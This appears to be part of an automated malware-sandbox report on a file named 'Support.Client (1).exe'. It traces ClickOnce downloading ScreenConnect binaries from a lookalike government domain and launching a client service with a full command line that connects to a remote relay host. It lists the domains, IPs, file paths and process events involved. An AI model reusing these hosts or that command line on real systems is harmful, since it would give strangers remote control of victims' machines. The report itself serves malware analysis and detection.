                  Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA9F7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2548221803.000002CAF4D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClient.exe
                  Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClient.exe.config
                  Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileMana
                  Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe
                  Source: dfsvc.exe, 00000001.00000002.2548221803.000002CAF4D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe(
                  Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe.P
                  Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe.config
                  Source: dfsvc.exe, 00000001.00000002.2549254010.000002CAF4E6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe.configQ
                  Source: dfsvc.exe, 00000001.00000002.2548221803.000002CAF4D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe/
                  Source: ScreenConnect.Core.dll0.1.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                  Source: qmgr.db.5.dr, edb.log.5.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                  Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                  Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                  Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                  Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                  Source: qmgr.db.5.dr, edb.log.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                  Source: edb.log.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                  Source: unknownHTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49735 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49749 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49750 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49752 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49754 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49755 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49757 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49760 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49761 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49762 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49763 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49764 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to dropped file

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

                  System Summary

                  barindex
                  Source: Support.Client (1).exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\user.config
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                  Source: C:\Users\user\Desktop\Support.Client (1).exeCode function: 0_2_0061A4950_2_0061A495
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B89AF4F1_2_00007FFD9B89AF4F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8A9D5A1_2_00007FFD9B8A9D5A
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8A31BD1_2_00007FFD9B8A31BD
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8AD4401_2_00007FFD9B8AD440
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8AB2D11_2_00007FFD9B8AB2D1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8912111_2_00007FFD9B891211
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8A32291_2_00007FFD9B8A3229
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8961381_2_00007FFD9B896138
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeCode function: 11_2_04FD82D011_2_04FD82D0
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeCode function: 11_2_04FD5F0811_2_04FD5F08
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeCode function: 11_2_04FDDA0811_2_04FDDA08
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeCode function: 11_2_04FD82D011_2_04FD82D0
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeCode function: 11_2_04FDDA0811_2_04FDDA08
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9B8A70DD12_2_00007FFD9B8A70DD
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9B8A10D712_2_00007FFD9B8A10D7
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9B8A10CF12_2_00007FFD9B8A10CF
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9BBB5A2112_2_00007FFD9BBB5A21
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9BBB6C7C12_2_00007FFD9BBB6C7C
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFD9B8AA71013_2_00007FFD9B8AA710
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFD9B8710CF13_2_00007FFD9B8710CF
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFD9B8710D713_2_00007FFD9B8710D7
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFD9BB830C013_2_00007FFD9BB830C0
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFD9BB8079013_2_00007FFD9BB80790
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFD9BB865F613_2_00007FFD9BB865F6
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFD9BB8721713_2_00007FFD9BB87217
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFD9BB8682513_2_00007FFD9BB86825
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 6872 -ip 6872
                  Source: Support.Client (1).exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engineClassification label: mal54.evad.winEXE@19/75@2/2
                  Source: C:\Users\user\Desktop\Support.Client (1).exeCode function: 0_2_00611000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00611000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\DeploymentJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6872
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\DeploymentJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client (1).exeCommand line argument: dfshim0_2_00611000
                  Source: Support.Client (1).exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                  Source: C:\Users\user\Desktop\Support.Client (1).exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Support.Client (1).exe "C:\Users\user\Desktop\Support.Client (1).exe"
                  Source: C:\Users\user\Desktop\Support.Client (1).exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 6872 -ip 6872
                  Source: C:\Users\user\Desktop\Support.Client (1).exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6872 -s 748
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe" "RunRole" "e04200b7-51c0-4bc4-8341-7c372a508bae" "User"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe" "RunRole" "f3bbb14b-5a68-497e-a4df-886e478b3d62" "System"
                  Source: C:\Users\user\Desktop\Support.Client (1).exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe"Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 6872 -ip 6872Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6872 -s 748Jump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
